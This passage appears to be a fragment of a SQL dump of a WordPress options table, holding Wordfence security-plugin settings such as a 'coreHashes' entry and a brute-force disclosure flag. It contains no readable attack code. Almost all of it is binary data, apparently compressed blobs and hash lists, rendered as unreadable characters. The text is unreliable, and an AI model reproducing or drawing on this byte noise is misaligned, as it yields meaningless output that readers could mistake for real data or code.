WPZOe3oOUڴ	orK5<<\r=Z!oj?O+.OtxbosJ:OIooLvg֗];3ܾg(w\'?\rϨMg3i];);(w+g.g\'goų`ϳcĳe<<y~nz򎼊99&iMVyNh i)sr2`myx\'y\'75<*|_|m%9..Y#yyam+yWixyKx1?bd5Xw/\nU:x+f^^0/u/\r<ˠy2xw^yxYxYy9Iqͺr^b/p^퇼b\Z^;^+۝+c\nx^Ż*^+҆˫ȫ&oI:y\r\'x\rm;y\rދ#RK&#iQ^t1$u^*}gp.׃$>>1My\"x>_x%AgF`&ox7SA{/&PxBywy`\'9om/9|1O\rBoW+w1PA\0yPA<PVf\0˙EzHz~zb+zG1l1طy=v<N/c.y͑<~HOOZ$D\r<AOShy\n1xoeoQ,᭔yUvYU>*b_w|U-__9k5ͪT6.ׇlN78MÊF[7oBte4]߃woq_^?j?ŋ\0`7M|\'|S|*m|ߥ|<52vl|g%rwKQf=Z=\'O2nOJO򽍳މR\Z#~\0Џ1ʾ?1+/mſOz*6_N_GlGn_\0z~Lc-?vۼ;\"ǢQ1~bu5?鮂;K\"~?mEY;tpM+<9~*\Zq#QtIj)Fo7NJҷ,[L/Z濾\Zcdo_wwzLw{՗h~&ȳ hc<?O}Nɟ~RşM	*Npҋr |Г>5>tM	ZCQpB\rc_cX|l]\'1EI|<ϠO|e>=5ՍC_|_#@ejLV.Xsy`͓-kwi>].h\nUu;=>k\n[\n\\ͮo[l~/J#!g٦\n})j\"	v.	vwiW\n&\ns>z	LOLZ.yA\\$xK`)^,(Xl9YvZuNj\'pnu\\m7{G8#N]x-8ZŢaϛ7\rkAK]A`]ܱ(zo)_\\\nBB``A#(տ%w@pKpUYpzt zAL F)~	RR_CiN:`;Ac Q  S&S*{nA<Aa@#BP~{2㨠ƷJPU*<</H\rvYP3U1sAv+Z}WvF	mjA%AG$hoLt)t>	cmnh>>\nzz}=F:A(Dz(LhU]_*U%\n	.1_`r`Rj\"(.!K,HKI0wF\0\niW;&(+`OpayI\0+@:U;+\'\ZdC@^- &Է4CfW\'`X	!>vUX )},ft,%FG,9,k	VcjժV՞\nպB3kᗄQ\r^pB}.\'zz;;}=B#oLChQh\"\"4\r+͓M_3V	B57\r[hQ&_:n&<sli9	XBdqL$<q{Vx <f.<z>zzB38tf9ᙸ|aPՈaHAb6Oxq.Yx0̵^n&<*^w^G\'Q\07avLxCKga̾ta̩X,a}¤䶫dn0#LR.L{+x,b\"{JxO7_xK(̆掯毬DE	l$¢w>hkaI4BXͽ/֢ͅ[º\ru:@a~DX\'*|)|6cϫ_F\nUMWyVc}f麰mz}[=x6\\\")W?tl#*XR8GGC;Tp*q(?i>Nk)\nݝ!8&>&Z	(A$l&1	6#:)kDy!ꀐ|Zh|\"dm.!Q`kW(\'\nNB])~ʿ\n+KBpg\0\"NtjTW,eurE}YFh-h-eQ>-i[tdSMlі#-+q{ 2Ut0GdֶUdZthS8W\'D9\"{-Nא-Lt)rz*rQƊ\\w\\D9\"We[]CEtj?G7VMN(K(:#:;<?Dn)]H@..%PZ/ܻFqTA$N];T#vU!4-2|!Eg鈢qD76nnEqt(G(q!Jz)JvÊ22=\\(;fTh((,*tMDDR닢RҶҟh5Qr=ל=)OT}>_T=L? M.=YZ=uh^ly#zQ<++9+z}\"j=^\"jm>&zm͚3E^ˢ.\r.n@G]-?!w>==\'D9/\Z<\rm<-\Z._\rƪtE_ɣ<d|蛱 v䈦=DAߢ`hna\\4;-,GFoLE\"pP~A.\'\rX:%auD^D\\\'\"}&\"?ћDLKuIĶ9!6{xnLH	8a\"ɟti@$-RL׊UUSUmū~9U5Īqb\03\'5;\ZzZFxCwn|xcQm;[;ĻĻmO\r_{Vl+bCbSqbbbzg-Bl);՟;+vO<,#S]4qg8J\\.igCDc/?_J9!C|[yAq_2AJ&\'oouIs$C$NNM\'?8,NZ_\"-%Si;6eBq^8/tXC\\xIM \"I\\kKhqهNq#88$; tY\\9e+rŋk>l׽x-~\\^\\U\\O~+~:)~$7ԔH^glf⦅OfqsLqW+Y8q˶_+oj;J;~}UqMq琸xp6Y<.W[\'_4\'k_O\\O\\OgGĿ<ĿWΊm+¾1ШFCHR]J~V\ZD!1y{ܳYYw%bVI>!f͋E);ŋ|I{RU+^JT~LIVGI46K4\rJdpDDdSdQ7ɖA=ADcdk]-CA>ނ\n}Yc#Vbz@ Y+LNX-\\.CJl\Z]$6L$׏HlKl.I7IӒ%|equiSsI[Kgk+k瘣]$@8ߑ}*	2ؒibCL\"k$\nQr-YQrf+2-$&YY-*aInHnhH~$飫%M;;ѯ$Hrn.Jr\'$yF.IQSIIIakP.)nwHJ%oK*=I*r$U}aՎ8IDDfܓԥa$uڒI:䉞8V#y攤<T i]AIN{G)-Ns%$HVa%c%dK2d2E2d{dn9Two@YJ=8JjBH0\'%*	5VB:EB\Z_%cJr뎄:!HHXׯJJD?$biݨD2a+7J$pźC]֒Cw%UMUUT5@f\'U}j@HJ.HYK^ͷ~II`̥ۦ	RNtOv԰\"Uz/5&w&RӧRنRվwXBz:/u&u\"JKБKW\'^ϸ/G#uUҠэsQ!}!I/UKÃH#W}WkupF_9*騔LђƉf7B	M҄n-/&um`m.$Ҕ\\iʋjijb4mRW%M-ͼNzǧWz7I4YzVi^}4{薕xs_ZڰNZއVH+wOK+[J,ӥU)Ҫ7ZҚ҇\r:FiOYx11G%}Ju+H\'HIK_aKWH?r^,dH[xG$KikV:iGgiǭ`i\'Wp_}RM7@B]?GoHjZҡG:ҡAtptD0-~.V,,CtPkۼW]`=%]HJ1RȵR`I\n@HP)EEjtX)6ew,_I	\");)3XJM;\"VR:o!_\0HRFӒ\"oR	]*Ke7\rʄ5ҥGKP)ZlCٚ\rue\"dæe2/\rd2ev22@l;2}q>roT!3L&_N61eo+ 2u2#<Vvn̴+3;!33\'H0Yz]vhJ0AOf_/_ˎ\'e2W)2[Q2ޏ2Wn[9W-T7/y ;ů|ZO|352ɲ@bY|\\X͏dSeh+Q+HGYk*\"Rvm^ٵeȦ<Y䈁,:,:,(%ݚ|,\r~&Kl˒ԣd)e;,\r,Yֻ]!Y.2LW#e<dųBYHVIV:%+)\\({KV$,\\jKd=lnreNŲ?rY;gdz2d/=^5^eeoY6kFYeY;)dz7z1eU\0\"L6I6&}֔}[̓MUȦiWduYXlÔEknD雲?òb_\r ɐd{e(?CMWp7;dNF+#>U/dp͢FFÒdtz8CZ#c+c18;d@Q(pjde\"k[ULQ&J/ʔ\rejtmٿ|3ٿ;rA|G`||MN|\\nuwɵdrA\\\\|q4Lc|`|\\wPMn#,߿n\0<VnG[n=Wn/7<+7~Gn֝-?l\"\\;+,2[\'o?#?~[~6MP\\@lQ?˝N4ȝF^OjOH=7=\n&f><χPr&r_gYX\\ȗ+TxF C_)IGjon<a ԓTqE:<gAJ$\'S~?@SۣyIpyK<oD^,/GKK+ҡ!y:OȳY8Ik!YZPy_Um\nYX ױ oem.v׃fyC);+;nYAZaI}||S>*!Ǣc?/ɿOlO˿ȧRgGgnȿuݑASb	\\ה*^ Tɡemr褳$J1r~p^zC_cw1XwДlR&\'ѳ\0;9u&gN3l<9Z29/맜a7œ\"HT,	5\'Kw˗DJ|vBC20XY6Uo>P?XqB8DabDicbK-XK}H-b\"I36S0M{U,]絧}D/obߧ\nNKH{TaHaQ=ܧ=械ߴpRp)pRp5Vx7+<9C^>\n/?mp¯Cﭦ*^sTy@<SnU};g)΋r).G*B+SbEx2VqcJqe(Xq\"nFq\"v@7lRYqrv\"q@t\"\"EUH>Td\0)R~T̄*r34ˊk]QIWQn()*G^CJ\"Eefuꨨnx󮢱^K챢l⥎UMk3׍-${o[E[t3?N蚹ިpW#S*>+(jl)btbl}dزbyիwV=\0T\0\Z\n\Zb@R O)PKx\n6a\n\"篂**)k|~Fg*]kV\nB;PޥPR(f3j\0Ŋ7J#MRP\\u%^jT+w+]t^Da\\czN3NSSأ\\5Ԣ?UW5+uՕ=+7QnnPnLVnJWv\\ոrTOv_OJCrK>-rrߵ*8 \r<ȉVTQTS*;tRZVZ(mΚ+N*cvE}U(#Nl-P:Sݕ.Tk/\r\\選rئBPl\\<$V~}RyM\'<+pWԅ*`z9tʋ\rʰAGW[_(#+\no)K)ofS(oT*\ro)K+5t)y221[mVemRw*ߤ(Z)KW(K}ʚ\'5,oovڕ|e퇲NT>ݩ|{M蠲!WHR>8|~G\"gV|6U_}TOnЭlWvR݉iʾȫʏeBr?TUYQ\Z##p-_%r\"kr2D~UNӔluWk))3sm-.J\0J	WBn)aKJ8UܥP\"[(Jq%앒$\nPm*)&Ԑ%\\ɜu*hC)OXr!bq\Zx >EC+rJi4.8\\CK\"B	NIIHT$\r%PT$RtҥzѠPznng@(%虳zCQe軣@(hP-/ˠygZ`|WA;=]Лz,~_R\r`F]Q}rp`<=۹`c$L5i%\'a50c\'Nyf`1Xt:eX\0]ym-=v`k0e,P+G,}4\nnu\\*en1_<﯁R^`tY|d;iC}gF}?=6&q:lUD6uNm9>qaot*xB D\'Bo@H*84JLpDg?9eD;A_eS}b,ؽ\rqVBEwU8b$N2$HRggP#87k=}.Az\\H_<2lKw2o~\\\nWՕpͰnV@T;p37Idc.=}\nBQX)<MG\njP|<<q_=yTCx\'\Z;~Ibp\\\0UGW_+\'x}F@Q&4jBh_@p2M2|w:[Ows|z3*`v֚aOYJ\ntB\r{.>Nި|\ZU~t/;΢8`\'/Aq!vQ{P#7WhpGeq8ƬtGKGJ>kU	/\"pb\Z/Vt)$MI6NiW4ph\rQ4[,`Q9CWh~Z\\-)Z^|izh2F2*C;l/:pK9.\rU!i=tz:WMDwQ\Z=\\G8=ߏC/Kw5zrBV\\7L\n5?{gMCߜz߃~I1@?nL@+9nx[bq_wp5{o{m^44_p?3x0\Zr6%x8ãNvq0[w\n}#y&<$Cɚ0?`=1c[/5eW+̲YSzK=f`Nbo읆7{oM?ǻ5e{e%j,BXd\\\n|şI?G,\\eϻ㳄h|	\r\n`5+kcո]ҿ_VX]\rk<W`Iob]5?N3n`Ky~Vٌ\rFI~dw~H3\0t${ȓI4?n.}r\\E=3Iig5˔zB}:H9/TPi@ѤMҠqir\\[B5\"i]J!H{Y霉a]7аwIo	=n&dL!/Ȱv>\rL%40M*J)\'iʢd^J&$hځ{4|+M7/d溚dnLH\r&d9͐mE}S9,%6GBBEF9ϥ%\Zts-M;L˜ywtsU\\Z@ՎeyŇeZgN>䛹|O%?05;6XPږ@}ӂhڇ(?K|Xc:M\'P52:H3/PTk\\	tjd+7(n1JP$JPkEl(Bg>J-Ԇ:?b)Q5S1o{A]J<(kv\"]u@^ 6Lv~B9FGʝ|r[]274PTDzÅ:*J]ORg_*\r2s*\ZHeP-Fs=U;2uIGһL ?fPÔ(-oRs~hKmKj_ګOuUs@\\ًʆp];-X!rSYq?Φr=VgU.yɪ]GSVmVuXm~\'eA}<љАJYpuM`<ڄeO``56#Va<x	#\r<[l̖x<a:O\'ڰd<Ý\')3٤L^3&i~ώW`M<[&b+,p{^0ZG;5t/_W˃?\rRmŮ&_ͫN]eyu-qِ=c&Bxe(ղ&{\'?bʾOoPf.@-\\~9]wmݣQq8~C8tq9ީO{pؚt˨6|s&ٕg#G_8ҹ#	c\r>QS?sLO>xO[ñ9VOo+pݕINMy(sy|qh}Ô8&_fk-|{Nѓw}||..(̅;\"ü(~ؖΏۺ\"pu.7IE\\Ѝ+^sa~i;n#fg\\Ńk5sN~S؅;n;m>rHn|Cp}4@?ֿ%MώY~^g3bگQP6]Q>Q\']jQ}!eWd5!Q䄋vhg}O\Z8Wt\"~XO)ݎ2줱*4$?C_Ā(EH<8(c*AƙdDjIˣdJLm6ފ5VQbuJSlU6Ķ־w]T)[dAHYxU8*%ʲԌeiL8ӫ4Y5tT#;WIɺ)	_+KY?{W4Lٺ3M(Jzi(;%X\'JzLҒvИ>rx\rkx+.WZ9D5?TPX-	+NH⑋XV()k^KJ`\'c%uFSi#$ӭHIsɪ\"Y%r6\'A\"$\'*Rr%ש@޺ɝR?T$R01J\n\'ΓBUyV*u\nq<EwIqMHIgy:J<$cʤ@I~yTx{HŶRY Uwe[BjޚKMZ=~B;NEMȓ9(\r{KۏО%.i|2 -fR+H_i>Gf͓gk{|ʷQ1]:HG\"nK\ZS MЧ$aͩfl?wZjȑ\0','no'),('scanFileProcessing','','yes'),('disclosureStates','a:1:{s:22:\"waf-options-bruteforce\";b:1;}','yes'),('wfsd_engine','','no'),('coreHashes','\0\0\0\0\0\0\0a:2:{s:4:\"hash\";s:64:\"4e7c07f00d3d7a4a540ce5624e300a01cd5a6b5754a477f4a3d93ba663be36c3\";s:6:\"hashes\";s:127616:\"\0W7ht#	q)d$\0\0(ZYY@Iqȗ#T@\04ߗt\\vQ޹\'_ajxҦ\0E=jȋ|p8.½֤SGp\0EqxPa>bvDo4VG;a<\0^N弘ae|K-ܰɜ=\0b&F%|w*Qr;|/=(A<\0#B5j$#j!bNj\0ۧ4(KI|0qD.^v\0>|;(߯\\W*7?\nN2=7[Uo\0iք\"]^XD2](\0/o):4]_+̔c\0e*@t\"q	ȐN5H\0T|̅_S8O0μ¸06\0-bsG\n(hr\Z.n!ez.YxUi5G$PuvATʦDIXVfEWeG]q)6	jnNؤ^}0[PKXs+ȉawS[U`|WSPD羟Nhb!#8i>kq6RE5:\"ϱT_^gyzGL\"1U}6:l|(㜦q{V~u<Dho*cϬ0xcl$	4mo`vA:`{rf_S3/sm?d^͔0X0#q-ml*#TcxEyũH>$2]%*6\\dpۛ!s%]ZYoݿr;G\"Gu&w]-H\rRW\\5\'=Q7ai\rICpEKykѩ}ˣ\\$p\"&p+^\Z{5|f㵅SLo3ExѥUq`q4uZ[n8Or70H01YL$RRAhJ6Mw:/7.ڏPh.BU-ї\'Tsz+pM˻yULKCWa\\ˁ\n;0Ġ\"fАΟ\'\r͍DdMsǿڴ$2j),\n\' #69\nږmK2efte4\ZGG.fVy`)\".o[`ϐ\rnjnviU\n@,+!%u	re4+JuP$,WNP2\"Ş,|^y޲/\Z(A1]/ƅBMj:@ѫG+SfdVi\n6Wԑ\\<OEj2Q\r|X6/46J?XGX~uic\rpQ활\r?cLTӊqgȫ?crȸtdB\rTJ,Q$TDh((ZdzvO_;ƀEpY.&}_	QoSnn̵v\0)Ӥ:DILV\0yZ)K\nܘD~%Roc7\rL>1݈]^]RɢNFMJ,iI.2 >1Z;ר1ԁ$!W:	SxDq5/w_W:+f1zg\\YmxGO0jo].㖽B=f~:NFa6ա\nY \'i+`fGYbmUPMJڡ0&CvM$O4-K	o6lb1E;7x?-ǱZzE*nkEm@1sY#1$\Z=IbXBr?ͥ-!i>`]wBκ@kp&h4ԛ2f\'GIS}}R⥅JЛZ[`mI$=D֛&Ǿ@+բz=i S\Z\Z4ڶ1523\r#?EQLIm$ZB\Z!&͖Ck`7\'/]i5\0%%-)^\\\0t`k@UOŔcp>!8HB6=b!nz\0OS~K|$TlJbOwf\nTEg\ZU\rl{SYD7I.`Ï}#٧JKNeӌ&ЎuѡIqtn~T	_j-%?70i}eiZO&E+rXe{emX<:KSz_oeŭy^/?h;@rK%LPfc(|_]U͒o~MEs@Z2]i](J~n3ϝـhjqo2kLJQc\08|VANں)\rmMADos,$gJ	Ŗ7l}aw|gRLh!1R&\'kD\':8Yߤ\'\\\0|8(]xZvJ+~S$ً6vgAќʋQ?j`JN]0&b\0V?9\".I32r)rk+`NiM2]<	h\n˥O35F\\\0,vS+p\n.\rJ*RT	!A&UBtG=_:\\]>i?η@ڹaKպ*Խ+]ҮgƉ^62G\rS|;)$=Xn!l=@A:V56Ux5Px&:VV-qXA9M4-t\n{}MI	AE0N.T0b([oYd% +[B f<3)|y-d]`,5l9ox;xZq@51aIxMOYU\rZtKϭuJOyŹ&Ҹ*ܲus#t1#4䂹\Z\'&8\0m9;:ͼff)I;Poi=DᎯ0Slhsgܺ{,`h`P*ͤ!j1m!~J\rO]Y<y}\Z>ɺHI|PBbe^Έ;VT1cj] k^O9A9/\Z%@b.` podf?jrYe|Hh>,ecRes5-D=<:3ϩM>r6Ԥ%zuۇ7}F[yx]kݭYr9IV,C2\"Vlp]l2Pf>Kp֚Jbvw`*w}*ʘ)>2qe^)PnGfR@Ol,>iv:`tQ*8\'<\nJ;H`Q؝6pqa%\r	\"An3HIs:Yae0BҲyPp\nﭾ!Λ&Ʌ\'M4BS+\'4&$ءVggog~m//&t+s\"#:Zܯ4㓉&_&6\"xF|w`AZ_+vL\r}NP6_Ұݾl2bqÜ$Uv	l,s\"\rm`YדUX^Ms6RH@	&冾Bx@dR#UOPgsHo)nWrtZM?%VDFv@*9Vμ[EBu}<\Z#d4*?dQ]Bx.|9D:h@Q/U\0-|_ۢ1g-+}Ԙ!^iBJ\\W]f@@w=	.]kZ1љmG]x0	14\"1IxGL[	>(GA:	64 2DMM$\r澐i\0	8\\ŬjAʔ5+XoTm_|	Myu$1ck_Kofm%	g)[.r\noi{4Q\n\r8H\rfX	vlٮ!Pm\n6|ϔK	~Cȫ7:s&ujt	+{Rلnt,Ǟ`|U		#t̹p=I\")F	֓-\nqUi-$h*ml	VhLC»>U8.`@<Kh	ͿU%OHޡ@~x\\6~\n<:XhQATop28>\n*<ӳ?HM\'VL\'[R\n@&[DqSBN#FB\n*An.]Btv!WҧMw9F\n+P_tQVo7n\nz#8J\nGk~ngm.3\\\n1ijgָ\nv?u	fh62B?2\03}\nxmnV=OD\0T)U\n\\_9()7\n/S\'g߃v\n9dg~@|B-ڐ6=\nT[Cp(,_V+L\rۨI(.\nsHчc -y//?\r$M̤j3\naqYKJҔ΀p\ZJj\\P\n\nڷtn\rEanJ;}(ҙ.9\nX:Q}+O\\_	{ܓC\'ay:\n W\"w\05S Nrh\nC0pFdl\0\"u~2\"Tp\Z\nv[\0XZppi.c;~&\n&)h4_`FL<:`#pf\nRW#ވ Qē4E[\'z61kK(]1zukpR!YC8`dfh.^8!{FNL{z),\"wWSJǲKSuᾒMcccdD(Q\\\ra[J?T?Gd(stBUI+uCRSF2>3`v\':js(-N֠N3:VS;CT\n]CrJ2m5CZ\0/@@11S.>UB|2ӜOU}(԰tc2ĒZVR顃[l#4>1εEl|lh]:Yň3	\\gm̻1)q+#b^0rR_ҲYn,J́TNB(-g\\ICڞ:rn̿>TwD\nQ!@iDrȭ!wzL{Jy7-mG鴞Y[kEn#XviwR:M7KkRD. L9%SJ*n\'ͪt^VɹO*(7Y(Vz|%\0\'jlص$hTC՞N8kȺym-BYVAlͼ2VS#nX6XDUT=1O@,x )\r&d5s/,\"d\r%PcW-:\'2U\'Ftݩz\r1?;IB=S\Z2֥͐&׆ZB\r5CٖNskl\'t35\rQi^\ZB|fC-/rUY٢B\rX[cdpSs3%.X|Aw#(JL\ra{p9(A)ˡ̮SPVs6#i\rnu:Ft\Z\"P9qPRPA\rk<vWPvg(Hтc+d7\rYtW^}rIxۯu$/dMk\rU:w,&Kp&\Z\r7GٛrXylﳠ<U5p8n\rXd	D\nqbc\Zu\rٓC7,<p,L~rYs#\r\"(qq6ZNş&h\r\n*J6V^%W\\y\'h?II3z(BGQ#`pS:eJ&/ʝaɋ`\n}\Z\\x+G\\%RO6}㕓悫-FkRV6G_e\r\"}Q^uYtYsNldU|7tUFYnaIWRHjwHBBuXp\0bUe$OrΰYeJXpW	!L	oѦ?11]Q[7*a3Ǿh,Uc\\ki6uJ\n3*KviA&4=Dq!蓸֧f;4PZeO!vx.e8jY0\ZPP1S/0?U!͝6??Zvw=2H:)x.o\\JtLUoL~)6K5S$ʂ8⡧5gg73lsuؾyZwڠ0YE\0身i\\|7wq;,rLX\\35qv.R߼h<<thD$\\FM(b;ˏKg&\n-nzEja #[՝YdIdf@\\K2o؂/*~Hwc@2,P0x`ՁdZvs.k\Z5\0yX$j뤋I8@t={9v>:̷M\Zϵ\rBt\r3tC Y\nH$$T̞}^pfO]ǭN3%\r\\-AJKK7Pxe\'PHHP=,LN}\ZEO\\0uFOR\Z)ā;S\'bN<vwLSڻsT|>Qi}GD7OF5BNov:A_-3x\ZJB@ky50\nQ(;4.`Rw|lSPpkGM8ԹfEx;˝O[J`uOv&_-]E;|x$(t`\"/\Z=`>&oR֫	ڲ}Z	w%(4);\r;)6qi9C2td64KծAU)۳!Pdlw+>;O-dG;Ϸ6<wj;V4dkԷ܏>Dj,pk~*d}[H?iK[i/(^\\4c-Ȝ)͗۷@c.V_;q:uMXbWZ`Eض\rSky%/-u_EC?oTgNLC\"M61ɿ\\)ji]mb#6C2ao2ᨁFˁLW%\rVJ~p$P(q\0RS;\rs}o%XOwR	\\B;zb#qlESWDLex骴@m!~|dET9v,WыʀKK#\0f羀PP\0Aw:oHRRESGʏT-a*Qf,S7q̓<U*\";br^&7jFőұyZA\"Y!	=x`Jߩi.?w~/\"wU{Lf׏1:դy;&ۆ޹[rDbNv㤄\n\ZwrkHuEN/JYgSi)N]o}0<,eS</ܓ8CT2IUXjF\rPJ6\\d$Se=g۝JްS0ilww4:\"D=[Z\r#A@f31_<v(QNYCwo}z/+x\Z83ۀTё/*2^oܰ\n0\01x?F(8V/`8Іt2:]XK%	EL償t~nF^mKYN\"U[A7EOxƟ:Y{ 2gZ+j{hN.m۩+6r0qX{4a4=PҞ%^\\$~KObH$(\r_\ntl	6Ax	70)P;\01M{}i)-[\0=ֹ?+;Q/׬W/{lDAURprmm\rF6طi(\":@c:<R)%+:G%Cy*m?۴/\r!iAHK2w:%.;j@۴)H&RװRwciFz\r_c;QAJRQ6}%\0wQ1h~B׺ʌʤ!gy{8٢7\ngT1^0>\r劸֬+)7X[_u۱H]\"¡`nrXa;?~Rq3ٽR ar\0B<c=ORvBn|JIn;51VSK6ǐHiI (.fOdx,0XlJ.*Js9&$\rNZ/aUƏ`dL?>C|^vs_%W\rJ*fzKHvM,,z㡫?jk[0}FW@U0WgS2cFF|2`85SbG?e?q7#pjڥ|ɨ\0YO|aV3EFW^@l24K<\\/#\Zjp!CBڋTLX6jy\Z\nё4W\\\ZTM\\VdEබ|@])2ԕiqj\'Vp,KzMr#6hq	:@߮\r0lҞ6jZmc-kYxJ5_*]O\\sM\nT27oڠCg`c˰mupa\\|/Jy2fy2qt@WkmxGV͒׵pzk訍n!>x\\h|,e0?s4n,Lmu\Z^΅hU}1}=ziy\'\'|KW?[r(\r\Z3zػfW^P1Y2&ۑpAU%fG<+HH4ywy\'hzx\"v\\p$bo)cHvSn_(aWcʹA`kBʜѮ,2S^úD\Zѣ0?ޖft&!-U8<Gz<3\0R-k,u׼)\0\nk?R0}<̤. $^$mw޻`.A_[rE]J#+ߘ4D,EǡGfy5ܟ@nN	36M[yFRDm:m\\,T3y?PԈ+oKqraUWjj:MSC\0EpڎU=\\ف2%72B99k\r?rqQe-=Ozγ2z!.w\ZFPASӃPlZN!&Qw|c;\0,2aڢUPrYo:W3\"6uxhSئ3)]TCˎ1B\"$Ϥ_Y[^e\n41LHݩ̨<W`e	U&zտRB=PKqFu~\Z8W2\0	e`hp,-n};F \Z/q@Q!Xw>7.l8leQ,	naTߌCӀ#YU\"V1	]98}.@\rf[ɖ&1^g+fV`6)	5ESjrKuj%pA9Xc<_:l#(ǀv)ɣ,ĹvV-nzWE2DH!~\\ꩠFgJ\Zop\']Mi@P;VKiV(~n&^VTSn^Ey	u\0ci^Su%D{ox\\4\'10pG&oAMq5@= PxN^+5H9_r?MΩԴY5D`$BfyISWq؛rcW\nŒ+NA΢:W<\'dSB4,hܟ+{̗r~aAďcKAjTG/6\n]<E&@Ƿ(\0a{|,@haZݻN/F]\0cOJhÙLC	8׫hl2\"i\r2ӣ-୏XC +Ra,f6!\\I&C#2M8_6wsEUP[Wґ4L{4\ZUuw\'瞟hQi5z\r&Ђ`~\'\rQl;4ec1b0w~{wcj|m]a_d4N^\\~ʘ7q/\"]$&<Լ	QY)\ri\0\"4ߕml\"WKxI0$\r!L7K3@\"[q˯v1 K&.D,p	ڱ4zή)F\r8xNz$wFm$\"]Xe\"?|2Y	Ōt-	ࣟvTը2H`oHPOnuDpRֽRnOk2Ω@7 \'yUٙK;@I:7}.a	̑HMϩ:	qFCOc#y\r<եl4֬(w	]5Fn?`b8)k(S;wAq^;Tι[cJD_=$xB2냙$5)SjrxVIR-[ҟ1.;\"=1(C]e(d-|5QCv,?adkVlEWR*9)7mvXbڷ\'p	Z9@S\r0,t`2plsW)08aIpopABH7M) JOb\0!X+c͎Ǯԑ8@Ghar6rVB:\' 4-I9#\"iݔ[-l+\'2YU~nZcttMh?Dm%ʋd]\Z	MصB\Zr/O5%N̶\Z\nŬWOO,ԺNE\Z\r7hZBLG+vSd2\Zi\r/quVcx-ll8\ZÚZþި6W2lI96G\ZBXf\"ԭOݠ%K3ѓ93h\Z42o^iw$Se(I}P((\ZTcς6[LBcl\rxR()a?\Z[Iʙ`:}V\ZTDn+/`{\Z^\\%kOei:io\ZqRT=\0,\ZXD픚\ZhK8h\Zxy7{ zQ1+5:#Mu<\Zdhƨ,ȊaܑiK#A\ZtY-{RV ۷FR!%8`?O\ZIa^iJH:j:b\Z;4JpRӗڎXV\\2p&\n\ZmҴ`S|0	SsEAL\Z䜫:H2fם[Jm<x<0\Z7۴>0XϘ\ZKGUm0;A򳡆-vn\0]І{lCMvɾ@ƑT97C=yZ3Ήc3m!pr&,Y*l}Jpx5K5&\0CRdR5P,BiQf7Ꜯ&\'dWzғ|1Ɏz\"z|seQgJЭz-X+|@Vcx瘝s|0vɶP5T⍠!wRLjZ^\'{ )8m}.\rd_n5i?W):\\`^V=w=\"[<U܀ĵ9YCW-GMdz[gbꤼ&{737ki֐5є3N0P5y}@٪b1po4A{/\"ru0yLi(H\'v-3*3^c(^U#gphz{:7bc/LV9bar~D,?ѠGd)FAu``ڿoۭraچc,=sK>Pסe)9RB[|-s1ʎSPEGI45MCgY<-bO,w[6eJG7U]\\J5\\N(-\rX_j\r15-Q_Y\ng^ʸ\"|.Y|bO-b$t+8jK׹\ZX#[wwq51DjLH^t+?\Zci{íq@:[bdl9ր,ܱMS,elNr}6n\0O!\"j:(!b*C\rz\"{t\r =I)^sb\ZZ\nS\raL& v3+kCJI\Z<\0P>%@5v%( JaI\\ѓHO\'\n(Pӳ\nr	sJbmLh笇[\'{0luʒhkFNʨ\n,U|록X5)aTԩ %2Ryūi*%h%$)`v:#f.xd\n:xA-H>Jy;<I8w2A	ڸ؞02yK|_%d`29xmlQW薕U=dZ	ʒcWZ:wP{6Ly?طcI\n߾B2ߵzՠevz3ƘU{^qa%IBЛW<VA=lL^<kLsjҥ?bɖȒ|B?-(+xd6SPIjҗ:K-`UMun֧]BeIY\rf6y;6\r),P 6;\'6\" ds\r=V\"n*R-!`CG֋م\"^e\n|5.ް8!9:%\'&;CrAL*3q8$\"n$Foef$S4C\0}UJ5}&JmyNL5\r\Z0s3u6!$0KJ\r22ߖ]Ó\'L\0IMq2˪㏽\Z燧i(o)NޢVB nLc\rʿ52BG3u*0oBǯh }CoG}BdgD؉$O<L#1OF14.+kc*9\'q.;FrP\'l1e^>b6chNE4#\\GYZ>AQb&YZo>Qr͡i9\0T9\\>$2ݲjrwhqMTUЩw͙CHN\0I<.OƏͧfh_2E_T.ZuiYk.\\{g:FhdaGI\0q׹a\Z}*3yXZjoy\\oCw=usn@=]N1%P0.\"pTӜq(%7NO2\"hkUvr޴\'r-AD^EcZWq85qr@7VRۘ]7NijR\"~RO|⺥f`S:\rb-\\|ۃ9Egf]Hh~wwO\0LhD:m	3(TN,jpJ̺γSy9s68rMڠc4boT,>\n?j/&b\"\n<5.Bzn1YY]}{6^\roʠaXܖ^	捄s0ɻsy01)fx X`[Z76.-*PU-8m@e05\\wMv1.ʞRfq\"^hS;X~YY^ϻjcTxFw7?D?Fa\0-@h1+K(a]DR:[_I3ywtן#F3=22I8JpL]]}0nP\rQcJYB=niQ=NeձunS,hX:_U-JrS5btLȒ|n 4\0ْ\'/XMK,f\"*Z$4 %-b#6u|Ė}bJs6 .,2F*z&@;`x^#.W(` :kYMjxRցִP=T_U~Q Hʱy4BW@c\\JqGC WaQxD2-q%ol(]?A kuPt̊z\"qg=(0 l\n°&|\"wK~30,>P&w \'Ơ $nX37N<g YL&> G\Zu%X-) )>Q|	]vC, 7ćK4sNs	Q<s| \n	\Z?`%Tp6#IRlR ӌ[*ktC`x{c!ՙ\ZVWSst @W4n*tQ`EJ))e%C!Bw픴Q\r\Z-1O!Tvα!)u^)h\rȱ>uOK,hc$!,els\\055.fOte}!5AR/{CaF9Z_t%8,=۫!ZmNxI>W>%*r^#\\QD!]ͯ%uOb;Ͱ(2[\n_!i\\ ׌eQ\0rz.+;\0\Z)o53!\'o]tJ:soT!x6^q>F70VֵV>>!$1ŭ95\n2d\\aW\Zq3x!:qɴ&gz68֛d;tV;U!&x[w)ȃcNSa!>$wĜF\n%`IJM6o(!bFމg2oi\nNl+\nb!5Aà~I \\v(cF!(\'eЎ\r804@dD4KSkV!aZU/<rg$R4gZ0l!\r;m1ϼ.{r6@CHc^\"A!ĩtXQ\"ђm]2J\"TYKJ,/\\/ d\"h>:Q sikZ؝Ew}b\":+@b$TAt6r\":fnJ\"-vSX^\rˠ#\"JRIx9Wn\"aԙ\"L0]ӆ٥y)UeP^A\"S.87~96syjr\']s\0\"\\&S^\rxQf\"nNv?Kg^:mBlbZ\"$l}eX\\%\'AJ\"	.F͢Y\\gFy2\n\rMZ\"G$@PĹ\Z7~ԧOƦpdb\"):ze0E8=!7Ӻl<ZP\"/JK}uvaHQLE\"!zFۺ6&\ns|\"ʊǏ5\".Mp-zx)R.%.8\"،V2M.\\e#Nȡ>.:I\"_rЏMDZNa\"Lp6-@!#^kYڮXVFX65\"=\rB>\"H@Z#XVWΫ\"80#>nylvƩrK~8\";z`~g^_R5т(